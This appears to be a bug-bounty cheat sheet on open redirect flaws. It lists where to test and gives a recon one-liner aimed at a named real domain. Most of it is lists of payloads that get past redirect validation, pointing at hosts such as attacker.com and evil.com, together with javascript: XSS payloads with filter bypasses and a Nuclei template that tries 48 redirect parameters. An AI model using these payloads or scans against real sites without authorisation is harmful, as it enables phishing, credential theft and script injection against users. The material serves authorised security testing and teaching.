Open Redirection

You should be looking for open URL redirects in the following areas of your target:

• Sign in & register pages

• Sign out application route or API endpoint

• Password resets (inspect the generated token link too as it may contain a redirect parameter)

• Profile account page

• Email verification links

• Error pages

• Any important action within the app that requires multiple steps

One-Liner

echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew

Payloads

GitHub - payloadbox/open-redirect-payload-list: 🎯 Open Redirect Payload ListGitHub

Bug-Bounty-Methodology/Open Redirect.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub

https://evil.com - ❌
https:evil.com ✅

# Bypass a HTTP scheme blacklist
//attacker.com
/%0A/attacker.com
/%0D/attacker.com
/%09/attacker.com
/+/attacker.com
///attacker.com
\\attacker.com
\/\/attacker.com/
/\/attacker.com/
//attacker%00.com

# Bypass a URI authority component (//) blacklist
http:example.com
https:example.com

# Bypass weak domain validation
https://example.com@attacker.com
https://example.com.attacker.com
https://attacker.com/example.com
https://attacker.com?example.com
https://web-attacker.com?https://example.com
https://attacker.com%23example.com
https://attacker.com%00example.com
https://attacker.com%0Aexample.com
https://attacker.com%0Dexample.com
https://attacker.com%09example.com
https://example.com°attacker.com
target.com%40attacker.com
target.com?attacker.com

# Bypass weak top-level domain (TLD) validation
https://example.comattacker.com
https://example.com.mx
https://example.company                                  # .company is a valid TLD
https://attacker.com%E3%80%82example.com                 # URL encoded Chinese dot
attacker%E3%80%82com

/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
//\google.com
/\vicitm.om:80%40google.com
//www.whitelisteddomain.tld@google.com/%2f..
///google.com/%2f..
///www.whitelisteddomain.tld@google.com/%2f..
////google.com/%2f..
////www.whitelisteddomain.tld@google.com/%2f..
https://google.com/%2f..
https://www.whitelisteddomain.tld@google.com/%2f..
/https://google.com/%2f..
/https://www.whitelisteddomain.tld@google.com/%2f..
//www.google.com/%2f%2e%2e
//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
//google.com/

Parameter Pollution

/?next=target.com&next=evil.com

Creating folder as victim domain

http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com

Nuclei Template

https://github.com/coffinxp/priv8-Nuclei/blob/main/mass_48_open_redirect_check.yaml

id: mass_48_open_redirect_check
info:
  name: Mass 48 Param For Open Redirect
  author: SirBugs
  severity: medium
requests:
  - method: GET
    path:
      - "{{BaseURL}}/https://bing.com/"
      - "{{BaseURL}}//https://bing.com//"
      - "{{BaseURL}}/?targetOrigin=https://bing.com/"
      - "{{BaseURL}}/?fallback=https://bing.com/"
      - "{{BaseURL}}/?query=https://bing.com/"
      - "{{BaseURL}}/?redirection_url=https://bing.com/"
      - "{{BaseURL}}/?next=https://bing.com/"
      - "{{BaseURL}}/?ref_url=https://bing.com/"
      - "{{BaseURL}}/?state=https://bing.com/"
      - "{{BaseURL}}/?1=https://bing.com/"
      - "{{BaseURL}}/?redirect_uri=https://bing.com/"
      - "{{BaseURL}}/?forum_reg=https://bing.com/"
      - "{{BaseURL}}/?return_to=https://bing.com/"
      - "{{BaseURL}}/?redirect_url=https://bing.com/"
      - "{{BaseURL}}/?return_url=https://bing.com/"
      - "{{BaseURL}}/?host=https://bing.com/"
      - "{{BaseURL}}/?url=https://bing.com/"
      - "{{BaseURL}}/?redirectto=https://bing.com/"
      - "{{BaseURL}}/?return=https://bing.com/"
      - "{{BaseURL}}/?prejoin_data=https://bing.com/"
      - "{{BaseURL}}/?callback_url=https://bing.com/"
      - "{{BaseURL}}/?path=https://bing.com/"
      - "{{BaseURL}}/?authorize_callback=https://bing.com/"
      - "{{BaseURL}}/?email=https://bing.com/"
      - "{{BaseURL}}/?origin=https://bing.com/"
      - "{{BaseURL}}/?continue=https://bing.com/"
      - "{{BaseURL}}/?domain_name=https://bing.com/"
      - "{{BaseURL}}/?redir=https://bing.com/"
      - "{{BaseURL}}/?wp_http_referer=https://bing.com/"
      - "{{BaseURL}}/?endpoint=https://bing.com/"
      - "{{BaseURL}}/?shop=https://bing.com/"
      - "{{BaseURL}}/?qpt_question_url=https://bing.com/"
      - "{{BaseURL}}/?checkout_url=https://bing.com/"
      - "{{BaseURL}}/?ref_url=https://bing.com/"
      - "{{BaseURL}}/?redirect_to=https://bing.com/"
      - "{{BaseURL}}/?succUrl=https://bing.com/"
      - "{{BaseURL}}/?file=https://bing.com/"
      - "{{BaseURL}}/?link=https://bing.com/"
      - "{{BaseURL}}/?referrer=https://bing.com/"
      - "{{BaseURL}}/?recipient=https://bing.com/"
      - "{{BaseURL}}/?redirect=https://bing.com/"
      - "{{BaseURL}}/?u=https://bing.com/"
      - "{{BaseURL}}/?hostname=https://bing.com/"
      - "{{BaseURL}}/?returnTo=https://bing.com/"
      - "{{BaseURL}}/?return_path=https://bing.com/"
      - "{{BaseURL}}/?image=https://bing.com/"
      - "{{BaseURL}}/?requestTokenAndRedirect=https://bing.com/"
      - "{{BaseURL}}/?retURL=https://bing.com/"
      - "{{BaseURL}}/?next_url=https://bing.com/"
    redirects: false
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Location: https://bing.com"
      - type: status
        status:
          - 301
          - 302
          - 303
          - 304
          - 307
          - 308

DOM Based redirect - XSS

XSS

GET /signin?redirectURL=javascript:alert() HTTP/1.1
Host: example.com

# Simple bypasses
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)
javascript:alert(1);//#

# Bypass weak regex patterns (try repositioning the URL-encoded special characters)
ja%20vascri%20pt:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)

# More advanced weak regex pattern bypasses
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)

URL Validation Bypass

URL validation bypass cheat sheet for SSRF/CORS/Redirect - 2024 Edition | Web Security AcademyWebSecAcademy

Tools

GitHub - rootDR/ex-redirect: ex-redirect — An automated open redirect scanner using Wayback Machine archives. Supports subdomain grouping, live URL filtering, and WordPress path ignoring. Built for bug bounty hunters and security researchersGitHub

GitHub - r0075h3ll/Oralyzer: Open Redirection AnalyzerGitHub

GitHub - cujanovic/Open-Redirect-Payloads: Open Redirect PayloadsGitHub

GitHub - KariiemGamal/0dSSRF: a powerful tool designed to automate the detection of Server-Side Request Forgery (SSRF) and Open Redirect vulnerabilitiesGitHub

Resources

Open redirection (reflected)

Open redirect vulnerability | Tutorials & examples | Snyk LearnSnyk Learn

Unvalidated Redirects and Forwards - OWASP Cheat Sheet Series

Open RedirectIntigriti

Open URL redirects: A complete guide to exploiting open URL redirect vulnerabilitiesIntigriti